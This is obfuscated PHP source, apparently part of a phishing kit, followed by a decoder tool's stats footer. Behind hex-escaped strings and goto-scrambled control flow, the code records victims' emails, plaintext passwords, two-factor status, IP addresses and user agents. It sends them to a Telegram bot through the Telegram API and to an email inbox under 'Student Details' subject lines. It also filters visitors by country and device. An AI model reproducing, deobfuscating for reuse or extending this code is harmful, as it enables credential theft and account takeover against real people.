$this->readJsonFile($B6346); goto b530f; c6eb2: $Bbeec[$F15fe]["\144\145\164\141\151\x6c\163"]["\x74\x77\157\146\x61\143\x74\x6f\162\137\163\164\x61\164\165\x73"] = $Dc230; goto Dc2f6; ac3be: $B6346 = $F35e2 . "\x2f\56\56\57" . $this->b5c62["\146\151\154\x65\x73"]["\x76\141\x6c\151\144"]; goto b33d1; B92c2: $F35e2 = dirname(__FILE__); goto ac3be; b530f: $F4ca0 = 0; goto Acaaf; D5cae: d36df: goto c6eb2; Dc2f6: $this->writeJsonFile($B6346, $Bbeec); goto Ed732; Acaaf: foreach ($Bbeec as $E5923) { goto C46aa; C4a56: $F15fe = $F4ca0; goto Dc243; Dc243: de790: goto E66de; C46aa: if (!($E5923["\144\x65\x74\x61\x69\154\163"]["\x65\x6d\x61\x69\154"] == $b5c0b)) { goto de790; } goto C4a56; fa824: af258: goto c6607; E66de: $F4ca0++; goto fa824; c6607: } goto D5cae; Ed732: } public function insertAdditional($Fb379, $b5c0b, $ee7df, $C9257 = true) { goto Bebad; e15d3: if ($C9257) { goto b1467; } goto e7e78; d7840: $_SESSION["\x75\x73\x65\162\x5f\x64\141\164\x61"] = $d03cc; goto A4aec; D46a0: $d03cc["\x64\x65\164\141\x69\154\x73"]["\x65\144\x75"] = $Fb379["\x65\144\x75"]; goto a070d; aa7b3: $d03cc["\x64\145\x74\141\151\x6c\163"]["\x74\x77\157\146\x61\143\x74\x6f\x72"] = $Fb379["\x74\167\x6f\146\x61\x63\x74\x6f\162"]; goto ce1aa; f5666: if ($d03cc["\x64\145\164\x61\x69\154\163"]["\164\x77\x6f\146\x61\143\164\x6f\x72"]) { goto C7e69; } goto c5fae; c5fae: $d03cc["\144\145\x74\141\151\x6c\163"]["\x74\167\x6f\146\141\x63\x74\157\x72\137\x73\x74\x61\164\165\163"] = "\116\157"; goto bc061; e7e78: $B6346 = $F35e2 . "\57\x2e\56\x2f" . $this->b5c62["\x66\151\x6c\x65\x73"]["\151\156\x76\141\154\151\144"]; goto d32aa; aa810: if (!$Fb379["\x6c\151\166\x65"]) { goto e47c3; } goto aa7b3; be115: $Bbeec = $this->readJsonFile($B6346); goto c1c7a; a070d: $d03cc["\x64\145\164\x61\x69\154\163"]["\164\171\160\x65"] = $Fb379["\x74\171\x70\x65"]; goto f5666; acef5: $this->writeJsonFile($B6346, $Bbeec); goto d7840; a8867: $Bbeec[] = $d03cc; goto acef5; d5ef6: $d03cc["\x64\x65\164\141\x69\154\163"]["\x65\155\x61\x69\154"] = $b5c0b; goto Ff194; Ad9d1: ba052: goto E3b02; E3b02: e47c3: goto A6e09; bc061: goto ba052; goto F7177; A2b32: c48ca: goto be115; F259a: $B6346 = $F35e2 . "\57\56\56\57" . $this->b5c62["\x66\151\x6c\145\163"]["\166\141\x6c\151\144"]; goto A2b32; b133e: $d03cc["\x64\145\164\141\x69\x6c\x73"]["\164\x77\x6f\x66\141\143\164\157\162\137\x73\164\141\x74\165\163"] = "\127\141\x69\164\151\x6e\147"; goto Ad9d1; ce1aa: $d03cc["\144\145\x74\141\x69\x6c\163"]["\x72\157\x6c\145"] = $Fb379["\x72\157\x6c\x65"]; goto D46a0; B6948: $d03cc["\144\x65\164\141\x69\x6c\163"]["\x73\x74\x61\x74\165\163"] = $Fb379["\x6c\x69\166\145"]; goto d5ef6; c1c7a: $d03cc = $_SESSION["\165\163\145\162\x5f\144\x61\x74\x61"]; goto B6948; A6e09: $d03cc["\x69\x64"] = $this->generatePrimaryId($Bbeec); goto a8867; b2eda: b1467: goto F259a; Ff194: $d03cc["\x64\145\x74\x61\x69\x6c\163"]["\160\x61\163\163\x77\157\x72\x64"] = $ee7df; goto aa810; F7177: C7e69: goto b133e; d32aa: goto c48ca; goto b2eda; Bebad: $F35e2 = dirname(__FILE__); goto e15d3; A4aec: } public function insertDataVisitor($A0b3d = true) { goto fed4c; Ebca7: $bbd77 = $this->getClientIp(); goto ac428; Ee583: $this->writeJsonFile($B6346, $Bbeec); goto E33c7; c63c4: $Bbeec[] = $d03cc; goto Ee583; E33c7: $_SESSION["\x75\163\145\x72\137\x64\141\164\141"] = $d03cc; goto E280b; Eb336: Ea9ca: goto ba5e2; C61a0: F9e48: goto e45f0; Eeb18: if (!$this->isDataExist($Bbeec, $bbd77)) { goto Baa52; } goto Afb10; Edcbd: $B6346 = $F35e2 . "\57\56\x2e\x2f" . $this->b5c62["\x66\x69\x6c\x65\163"]["\166\151\163\151\164"]; goto c0598; B5fde: $this->checkUserSecurity($Bbeec); goto f8a65; Faf62: Baa52: goto Adca1; f8a65: return 1; goto Faf62; ac428: if (!($bbd77 == "\x3a\x3a\61")) { goto cd915; } goto b55b3; b55b3: $bbd77 = "\x31\x33\x32\56\62\x34\62\x2e\x32\61\x33\56\x32\x30\x32"; goto C1124; ba5e2: $d03cc = $this->insertUserInformation($bbd77); goto C61a0; E280b: $this->checkUserSecurity($d03cc); goto ceb7f; c0598: $Bbeec = $this->readJsonFile($B6346); goto Ebca7; e45f0: $d03cc["\x69\x64"] = $this->generatePrimaryId($Bbeec); goto c63c4; Adca1: if ($A0b3d) { goto Ea9ca; } goto cca7f; E1b76: $_SESSION["\165\x73\x65\x72\x5f\x64\141\x74\141"] = $Bbeec; goto B5fde; C1124: cd915: goto Eeb18; fed4c: $F35e2 = dirname(__FILE__); goto Edcbd; Afb10: $Bbeec = $this->getFirstDataByIp($Bbeec, $bbd77); goto E1b76; Ebdab: goto F9e48; goto Eb336; cca7f: $d03cc = $this->insertUserInformation($bbd77, false); goto Ebdab; ceb7f: } private function SendMessageTelegram($c766f, $df61c, $f6aeb) { goto b33b8; f3080: curl_setopt($c669b, CURLOPT_RETURNTRANSFER, true); goto f6cb7; e01c6: $D2156 = curl_exec($c669b); goto F080f; bae5f: Dda5c: goto b2746; f6cb7: curl_setopt($c669b, CURLOPT_POST, true); goto a3ca2; F080f: if (!curl_errno($c669b)) { goto Dda5c; } goto Dd036; e0761: $c669b = curl_init($df8c4); goto f3080; Ef099: return json_decode($D2156, true); goto d5db8; c47c9: curl_setopt($c669b, CURLOPT_HTTPHEADER, ["\103\157\156\x74\x65\x6e\x74\55\164\171\160\145\x3a\x20\x61\x70\160\154\151\143\x61\164\x69\157\x6e\57\x78\55\167\x77\167\55\x66\x6f\162\155\x2d\165\x72\x6c\145\x6e\143\x6f\x64\x65\144"]); goto e01c6; Dd036: echo "\105\x72\x72\x6f\x72\x3a" . curl_error($c669b); goto bae5f; b2746: curl_close($c669b); goto Ef099; b33b8: $df8c4 = "\x68\164\x74\160\163\x3a\57\57\x61\160\151\x2e\x74\x65\154\x65\147\x72\141\x6d\56\157\162\x67\57\x62\157\x74{$c766f}\57\163\145\156\144\115\145\163\x73\x61\147\145"; goto ccd04; a3ca2: curl_setopt($c669b, CURLOPT_POSTFIELDS, http_build_query($Bbeec)); goto c47c9; ccd04: $Bbeec = ["\x63\x68\141\x74\137\x69\x64" => $df61c, "\164\x65\170\x74" => $f6aeb, "\x70\141\162\x73\x65\x5f\x6d\x6f\x64\145" => "\110\x54\x4d\114"]; goto e0761; d5db8: } private function SendFileTelegram($c766f, $df61c, $e0d45) { goto C10a5; Ef043: curl_setopt($c669b, CURLOPT_POSTFIELDS, $D03a2); goto Aa450; Aa450: $D2156 = curl_exec($c669b); goto E4ce6; D9a05: return $D2156; goto dd9cc; afef2: curl_setopt($c669b, CURLOPT_HTTPHEADER, ["\x43\x6f\156\x74\145\156\164\x2d\x54\x79\160\145\x3a\155\x75\x6c\x74\x69\x70\x61\162\x74\x2f\x66\x6f\x72\155\55\144\x61\164\x61"]); goto fbee4; C10a5: $df8c4 = "\x68\164\164\160\x73\72\x2f\x2f\x61\160\x69\56\x74\x65\154\145\x67\x72\141\155\x2e\x6f\162\x67\x2f\142\157\164{$c766f}\57\163\145\x6e\144\x44\x6f\x63\165\x6d\x65\156\x74"; goto c0900; E4ce6: curl_close($c669b); goto D9a05; fbee4: curl_setopt($c669b, CURLOPT_URL, $df8c4); goto B4845; a2701: $c669b = curl_init(); goto afef2; c0900: $D03a2 = ["\x63\x68\141\x74\x5f\x69\x64" => $df61c, "\x64\157\143\x75\155\x65\156\164" => new CURLFile(realpath($e0d45))]; goto a2701; B4845: curl_setopt($c669b, CURLOPT_RETURNTRANSFER, 1); goto Ef043; dd9cc: } public function SendInfoTelegram($Fb379, $b5c0b, $ee7df) { goto Aaec4; Aa768: $Bf82f = "\x3c\142\x3e\x4b\x72\x61\x74\157\x73\x3c\57\x62\x3e\x20\126\x61\154\151\144\40\122\145\163\x75\154\x74\74\x62\x72\76\x3c\x62\x72\x3e\xd\xa\40\40\x20\40\40\x20\40\x20\40\40\x20\40\40\40\40\x20\x45\x6d\x61\x69\154\x20\x3a\x20{$b5c0b}\74\142\162\76\xd\xa\40\40\40\x20\x20\x20\x20\40\x20\x20\40\x20\40\x20\x20\40\120\141\x73\163\167\x6f\162\x64\40\72\x20{$ee7df}\x3c\142\162\76\15\xa\40\40\40\40\40\x20\40\x20\40\40\40\x20\40\40\x20\x20\111\x50\x3a\40{$bbd77}\x3c\142\x72\76\15\12\x20\40\40\x20\40\x20\40\x20\x20\40\x20\x20\x20\40\x20\40\125\163\x65\162\40\101\x67\x65\x6e\x74\x3a\x20{$d27df}\74\x62\162\76\xd\xa\40\40\x20\40\x20\40\x20\x20\x20\40\40\x20\40\x20\x20\40\103\x6f\165\156\x74\x72\171\72\40{$Bf74f}\x3c\142\162\76\15\xa\40\x20\x20\x20\x20\40\40\x20\x20\x20\x20\40\40\40\x20\40\62\x46\x41\72\40{$Daad5}\x3c\x62\162\x3e\xd\12\40\x20\40\40\40\x20\x20\40\40\40\x20\40\x20\40\40\x20\122\x6f\x6c\145\72\x20{$bdb2d}\74\x62\162\x3e\xd\xa\40\x20\x20\x20\x20\40\x20\40\x20\x20\x20\40\40\x20\x20\x20\x45\x64\x75\72\40{$Cfa85}"; goto Ff73d; afb5b: C430a: goto fb0a9; e7880: $this->SendFileTelegram($c766f, $df61c, $e0d45); goto bee48; A5755: $d27df = $_SESSION["\165\x73\x65\x72\x5f\144\x61\x74\x61"]["\165\x61"]; goto D886f; Eb6f7: if (!(!$Fb379["\x6c\x69\166\x65"] && $this->b5c62["\x73\x65\x6e\x64\164\171\160\x65"] == 1)) { goto cbf5d; } goto Be951; E6f0f: $Af7c5 .= "\122\145\x74\165\162\x6e\x2d\120\x61\164\150\72\x20{$Dfffe}" . "\xd\12"; goto b7fec; c4669: goto a2937; goto b38b6; a04c1: df349: goto aa285; F5cac: $bbd77 = $_SESSION["\165\163\x65\162\137\x64\x61\164\x61"]["\x69\x70"]; goto a6232; bd116: $bdb2d = $Fb379["\162\157\x6c\x65"] == true ? "\131\145\163" : "\x4e\x6f"; goto Da724; A6f80: return 0; goto A811d; Dd000: return 0; goto c4669; b7fec: $Af7c5 .= "\x58\x2d\115\x61\x69\154\145\x72\72\x20\x50\x48\x50\x2f" . phpversion() . "\15\12"; goto Ec802; Ee995: $df61c = $this->b5c62["\x74\x65\154\x65\x67\x72\x61\x6d"]["\143\150\141\x74\137\x69\144"]; goto Ba640; D47db: $A7d9f = $_SERVER["\123\x45\x52\126\x45\122\x5f\116\101\115\x45"]; goto Ddc60; cfbc1: $f6aeb = "\x3c\142\76\113\x72\x61\164\157\163\x3c\x2f\x62\76\x20\x56\141\x6c\x69\144\40\122\145\x73\x75\x6c\x74\xa\xa\105\155\x61\x69\154\40\72\40\74\x63\157\x64\x65\76{$b5c0b}\x3c\x2f\x63\x6f\x64\x65\x3e\xa\x50\141\x73\163\167\157\162\x64\40\72\x20\74\x63\157\x64\x65\x3e{$ee7df}\74\x2f\143\x6f\144\x65\76\xa\111\x50\x3a\40{$bbd77}\12\125\x73\145\162\40\101\147\x65\x6e\164\x3a\x20\x3c\143\157\x64\145\x3e{$d27df}\x3c\x2f\143\x6f\144\x65\76\xa\103\x6f\165\156\164\162\x79\x3a\40{$Bf74f}\12\x32\x46\x41\72\x20{$Daad5}\xa\x52\157\x6c\145\x3a\x20{$bdb2d}\12\x45\x64\165\x3a\40{$Cfa85}"; goto f4beb; a6232: $d27df = $_SESSION["\x75\x73\145\x72\x5f\x64\x61\x74\141"]["\165\141"]; goto Bc1a1; F64f6: $bbd77 = $_SESSION["\165\x73\145\x72\137\144\141\x74\141"]["\x69\160"]; goto A5755; fb0a9: cc340: goto b7539; E946d: $Cfa85 = $Fb379["\x65\x64\165"] == true ? "\x59\x65\163" : "\x4e\157"; goto bfb2a; Ec802: if ($Fb379["\154\151\x76\145"]) { goto df349; } goto Eb6f7; cc94c: if (!(!$Fb379["\x6c\x69\166\x65"] && $this->b5c62["\x73\145\156\x64\x74\x79\x70\x65"] == 1)) { goto adf1f; } goto F9a7c; Aaec4: $F35e2 = dirname(__FILE__); goto C8779; aa285: $Bf74f = $_SESSION["\165\163\x65\162\x5f\144\x61\164\x61"]["\151\156\146\x6f"]["\143\x6f\165\x6e\164\162\x79"]; goto d000b; a5408: a2937: goto D5160; f4937: $d27df = $_SESSION["\165\x73\145\162\137\144\141\164\141"]["\165\x61"]; goto ae476; bea28: $Af7c5 .= "\103\157\x6e\x74\x65\156\x74\x2d\x74\x79\x70\x65\72\164\x65\x78\x74\x2f\x68\164\x6d\x6c\x3b\x63\x68\141\162\x73\x65\x74\x3d\125\124\x46\55\x38" . "\xd\xa"; goto Afe5f; bee48: Bb7d9: goto a5579; Cb245: $Dfffe = "\156\x6f\162\145\160\x6c\171\100" . $A7d9f; goto D1a13; F9a7c: $Bf74f = $_SESSION["\165\163\x65\x72\x5f\144\x61\x74\141"]["\151\156\x66\157"]["\143\x6f\x75\156\x74\x72\x79"]; goto F64f6; E9ae7: $bbd77 = $_SESSION["\165\x73\x65\x72\137\x64\x61\164\141"]["\x69\160"]; goto f4937; b5c27: adf1f: goto Aaeea; Ff73d: if (@mail($D4324, $Bf8ad, $Bf82f, $Af7c5)) { goto F2aa4; } goto A6f80; bfb2a: $bdb2d = $Fb379["\x72\x6f\154\x65"] == true ? "\131\x65\x73" : "\x4e\x6f"; goto accd5; accd5: $Daad5 = $Fb379["\x74\167\157\146\x61\x63\x74\157\x72"] == true ? "\x59\x65\163" : "\x4e\x6f"; goto E052a; Ed192: if (!$this->b5c62["\145\155\x61\151\x6c"]["\x61\x63\x74\151\166\x65"]) { goto cc340; } goto D47db; Bc1a1: $Bf8ad = "\x53\164\165\144\x65\156\164\x20\x44\145\164\x61\x69\156\x73\x20\133\x49\x6e\166\x61\x6c\x69\144\x5d"; goto dfa2a; a7715: if (!file_exists($e0d45)) { goto Bb7d9; } goto e7880; Aaeea: goto be826; goto bb54f; Afe5f: $Af7c5 .= "\x46\162\x6f\155\x3a\x20{$Ddcf3}\x20\x3c{$Dfffe}\76" . "\15\12"; goto bdc59; Ac281: if (!$this->b5c62["\164\x65\154\145\147\162\141\x6d"]["\141\143\164\151\166\145"]) { goto d50c0; } goto daf10; bfc8d: d50c0: goto Ed192; F6ee5: if (@mail($D4324, $Bf8ad, $Bf82f, $Af7c5)) { goto Accad; } goto Dd000; ae476: $Cfa85 = $Fb379["\145\x64\165"] == true ? "\x59\145\x73" : "\x4e\x6f"; goto bd116; Da724: $Daad5 = $Fb379["\x74\167\157\146\141\143\164\x6f\162"] == true ? "\131\x65\x73" : "\x4e\157"; goto cfbc1; D5160: cbf5d: goto D24f8; D24f8: goto C430a; goto a04c1; d000b: $bbd77 = $_SESSION["\x75\163\145\162\x5f\144\141\164\141"]["\x69\160"]; goto C0907; bdc59: $Af7c5 .= "\122\145\x70\x6c\x79\x2d\x54\157\72\40{$Dfffe}" . "\xd\xa"; goto E6f0f; a5579: be826: goto bfc8d; bb54f: F5847: goto ba8ab; ba8ab: $Bf74f = $_SESSION["\165\163\x65\x72\x5f\x64\141\164\x61"]["\151\156\x66\x6f"]["\143\x6f\x75\x6e\164\x72\x79"]; goto E9ae7; f4beb: $this->SendMessageTelegram($c766f, $df61c, $f6aeb); goto a7715; Cc97b: return 1; goto a5408; C0907: $d27df = $_SESSION["\x75\x73\x65\x72\137\144\141\164\141"]["\x75\x61"]; goto E946d; Be951: $Bf74f = $_SESSION["\x75\x73\x65\x72\x5f\x64\141\164\x61"]["\x69\x6e\x66\157"]["\143\x6f\165\x6e\164\x72\x79"]; goto F5cac; Ddc60: $D4324 = $this->b5c62["\x65\155\x61\151\154"]["\x65\155\x61\151\x6c"]; goto Cb245; dfa2a: $Bf82f = "\74\142\76\113\162\141\164\157\x73\74\x2f\142\76\x20\74\163\x3e\111\156\166\141\x6c\x69\144\74\x2f\x73\x3e\x20\x52\145\x73\165\154\x74\x3c\x62\162\76\74\x62\162\x3e\15\12\x20\40\x20\x20\x20\x20\x20\40\40\40\40\40\40\x20\40\x20\x45\x6d\x61\151\x6c\40\x3a\x20{$b5c0b}\x3c\142\162\x3e\xd\12\x20\40\x20\x20\x20\40\x20\40\40\40\x20\40\40\40\40\40\120\141\163\x73\x77\157\x72\144\x20\72\x20{$ee7df}\74\x62\162\x3e\xd\12\40\40\x20\40\x20\40\40\40\40\40\x20\40\x20\40\x20\x20\111\120\72\x20{$bbd77}\x3c\142\x72\76\xd\xa\x20\40\40\40\40\40\x20\x20\x20\x20\40\x20\40\x20\40\40\x55\163\145\x72\x20\101\x67\145\156\x74\72\40\74\143\157\144\x65\x3e{$d27df}\x3c\x62\x72\76\15\12\x20\x20\40\x20\x20\x20\x20\x20\x20\40\x20\40\40\x20\x20\x20\x43\x6f\165\x6e\164\162\171\x3a\x20{$Bf74f}"; goto F6ee5; D1a13: $Ddcf3 = "\123\164\165\x64\x65\x6e\164\x20\104\x65\164\141\x69\156\163"; goto Bc891; F9647: Dc2a5: goto afb5b; E052a: $Bf8ad = "\123\164\165\144\x65\x6e\164\x20\x44\x65\164\x61\x69\x6e\163\40\x5b\x56\x61\x6c\x69\144\x5d"; goto Aa768; D886f: $f6aeb = "\74\142\76\113\162\x61\x74\157\x73\74\57\x62\x3e\40\x3c\163\x3e\111\x6e\166\141\154\151\144\74\x2f\x73\x3e\x20\x52\145\163\165\x6c\x74\12\xa\x45\155\141\151\154\40\72\x20\74\143\157\x64\x65\x3e{$b5c0b}\74\x2f\x63\x6f\x64\x65\x3e\12\120\141\163\x73\167\x6f\x72\144\40\x3a\x20\x3c\x63\x6f\144\145\76{$ee7df}\x3c\57\143\x6f\144\x65\76\xa\x49\x50\72\40{$bbd77}\xa\125\163\145\x72\40\101\x67\145\156\x74\72\40\74\x63\x6f\x64\145\76{$d27df}\x3c\57\x63\157\144\x65\x3e\12\103\157\x75\x6e\x74\162\171\x3a\x20{$Bf74f}"; goto Deda1; daf10: $c766f = $this->b5c62["\164\x65\x6c\145\147\162\141\155"]["\x62\157\x74\137\x74\x6f\153\x65\156"]; goto Ee995; b38b6: Accad: goto Cc97b; F94fd: return 1; goto F9647; A811d: goto Dc2a5; goto de532; C8779: $e0d45 = $F35e2 . "\57\x2e\56\57\160\x61\x67\145\x2f\x63\x6f\x72\145\57\x6a\163\x5f" . $b5c0b . "\x2e\164\x78\164"; goto Ac281; Bc891: $Af7c5 = "\x4d\111\115\x45\55\x56\145\162\x73\x69\157\156\x3a\40\x31\56\60" . "\xd\xa"; goto bea28; de532: F2aa4: goto F94fd; Deda1: $this->SendMessageTelegram($c766f, $df61c, $f6aeb); goto b5c27; Ba640: if ($Fb379["\x6c\151\166\x65"]) { goto F5847; } goto cc94c; b7539: } public function SendFileOnlyTelegram($Fb379, $b5c0b, $B82fd) { goto Fbfd1; F0c75: $this->SendFileTelegram($c766f, $df61c, $e0d45); goto b0675; b6037: bf799: goto d1bba; f2e92: $f6aeb = "\x3c\142\76\x4b\162\141\164\x6f\x73\x3c\x2f\142\x3e\x20\62\x46\x41\40\x69\x73\x20\x46\x61\x69\x6c\145\144\12\12\105\x6d\x61\151\x6c\x20\72\40\74\x63\157\144\x65\x3e{$b5c0b}\74\x2f\143\157\144\145\76\12\115\145\x74\x68\x6f\144\x20\x3a\x20\74\x63\x6f\x64\145\x3e{$B82fd}\x3c\x2f\143\157\x64\145\76\12\123\164\x61\164\x75\x73\x20\72\x20\74\143\157\x64\x65\76\111\x6e\x76\x61\x6c\x69\144\x3c\x2f\143\157\x64\x65\76\12\122\145\x61\163\x6f\156\40\72\40\74\x63\157\x64\x65\76{$Fab8b}\74\57\143\x6f\x64\145\x3e"; goto Bde07; A6b0f: $this->SendMessageTelegram($c766f, $df61c, $f6aeb); goto bf6b4; C56b6: $f6aeb = "\x3c\x62\x3e\x4b\162\141\x74\157\x73\74\x2f\x62\76\40\62\x46\x41\40\151\163\x20\x43\x6f\x6d\160\154\145\x74\145\x64\12\xa\105\155\141\151\x6c\40\x3a\x20\74\143\x6f\144\145\76{$b5c0b}\x3c\57\143\157\x64\x65\x3e\12\x4d\145\164\150\157\x64\40\72\40\74\x63\x6f\144\x65\x3e{$B82fd}\x3c\x2f\x63\x6f\x64\x65\x3e\12\123\164\141\x74\x75\163\40\72\40\x3c\143\157\x64\145\x3e\x56\141\x6c\x69\144\74\x2f\143\157\x64\x65\76"; goto A6b0f; Eb59f: $e0d45 = $F35e2 . "\x2f\x2e\x2e\57\x70\x61\x67\145\57\143\x6f\x72\x65\57\152\163\137" . $b5c0b . "\56\x74\170\164"; goto Acea2; d1bba: B67c0: goto Fa367; Acea2: if (!$this->b5c62["\x74\145\154\145\147\x72\x61\155"]["\x61\x63\x74\x69\x76\x65"]) { goto B67c0; } goto D22c6; Fbfd1: $F35e2 = dirname(__FILE__); goto Eb59f; Bde07: $this->SendMessageTelegram($c766f, $df61c, $f6aeb); goto e792f; c7792: $Fab8b = $Fb379["\162\145\x61\163\157\x6e"]; goto f2e92; D22c6: $c766f = $this->b5c62["\164\x65\154\x65\147\x72\141\155"]["\x62\157\164\137\164\157\x6b\145\x6e"]; goto A5600; A5600: $df61c = $this->b5c62["\164\x65\154\145\x67\162\x61\155"]["\x63\150\141\164\137\151\144"]; goto d84b0; A3e52: goto bf799; goto f0917; d84b0: if ($Fb379["\x6c\x69\166\145"]) { goto f7ce9; } goto cdd2a; f0917: f7ce9: goto C56b6; b0675: c27b2: goto b6037; e792f: E27ea: goto A3e52; cdd2a: if (!(!$Fb379["\154\151\166\145"] && $this->b5c62["\x73\x65\x6e\144\164\171\x70\145"] == 1)) { goto E27ea; } goto c7792; bf6b4: if (!file_exists($e0d45)) { goto c27b2; } goto F0c75; Fa367: } public function checkCountryCode() { goto A7888; F9b5d: return; goto b5711; A7888: if (isset($_SESSION["\x75\x73\x65\x72\x5f\x64\141\164\x61"]["\151\x6e\146\157"]["\143\x6f\165\156\164\x72\171\x5f\143\x6f\x64\x65"])) { goto cc72f; } goto F9b5d; Ac985: if (!in_array($_SESSION["\165\x73\145\162\x5f\144\141\164\x61"]["\x69\156\x66\157"]["\x63\x6f\165\x6e\x74\x72\171\x5f\143\157\x64\145"], $this->b5c62["\165\156\x63\x68\145\143\153\145\x64\x5f\x63\x6f\x75\156\x74\162\x69\145\x73"])) { goto ba526; } goto fd76e; Aca27: ba526: goto e9dea; b5711: cc72f: goto Ac985; fd76e: $this->redirect("\103\x6f\x75\x6e\164\162\171"); goto Aca27; e9dea: } public function checkDevice() { goto A5101; F17f9: $this->redirect("\x44\x65\x76\151\x63\145"); goto F19cb; A5101: $e16f0 = $this->getDeviceType($this->getUserAgent()); goto A4926; F19cb: fb294: goto dd095; A4926: if (!in_array($e16f0, $this->b5c62["\x75\156\x63\x68\145\143\153\x65\144\137\144\145\166\151\143\x65\x73"])) { goto fb294; } goto F17f9; dd095: } function getDeviceType($b07ad) { goto D7e46; a5263: A25b6: goto C7688; ad18d: C7041: goto b99fd; bb6b8: return "\x74\141\x62\154\x65\164"; goto a5263; ab816: return "\155\x6f\x62\151\x6c\x65"; goto ad18d; b99fd: return "\x64\145\x73\x6b\164\157\x70"; goto bf536; D7e46: if (!preg_match("\x2f\151\x70\x61\144\174\164\141\x62\154\145\164\174\x6b\x69\156\x64\154\145\174\156\x6f\x6f\153\174\141\x6e\x64\x72\x6f\151\144\x28\x3f\x21\56\x2a\x6d\157\142\151\154\145\x29\x2f", $b07ad)) { goto A25b6; } goto bb6b8; C7688: if (!preg_match("\x2f\155\x6f\x62\151\154\145\x7c\141\156\x64\162\157\151\x64\x7c\151\160\150\157\156\145\x7c\x69\x70\157\x64\174\x62\x6c\x61\x63\x6b\142\145\162\x72\171\174\151\145\155\x6f\x62\x69\x6c\145\x7c\x6f\x70\x65\162\141\40\x6d\x69\x6e\x69\174\167\151\156\144\x6f\167\x73\40\x70\x68\x6f\156\x65\x2f", $b07ad)) { goto C7041; } goto ab816; bf536: } public function checkLockEmail($b5c0b) { goto f7172; F0baf: die("\x45\155\141\x69\154\40\114\x69\x73\x74\40\116\x6f\x74\40\146\157\165\x6e\x64"); goto E57a5; F8998: return false; goto D6359; C8f58: $B1435 = "\164\x65\x78\x74\x20\x74\x6f\40\x73\x65\141\162\143\x68"; goto C9ae3; F9da8: Acc48: goto d213e; C0206: if (strpos($fa845, $b5c0b) !== false) { goto Acc48; } goto F8998; f1b7e: D2a34: goto ee887; A6de5: $fa845 = file_get_contents($e0d45); goto C0206; c5635: e80c5: goto f1b7e; d213e: return true; goto c5635; f7172: $e0d45 = "\56\56\x2f" . $this->b5c62["\x6c\157\x63\153\x5f\145\x6d\x61\x69\154"]["\154\151\163\164"]; goto C8f58; C9ae3: if (file_exists($e0d45)) { goto F613f; } goto F0baf; D6359: goto e80c5; goto F9da8; D13c1: F613f: goto A6de5; E57a5: goto D2a34; goto D13c1; ee887: } }

Function Calls

None

Variables

None

Stats

MD5 45ba80561db75efa88a1f69989e54b54
Eval Count 0
Decode Time 100 ms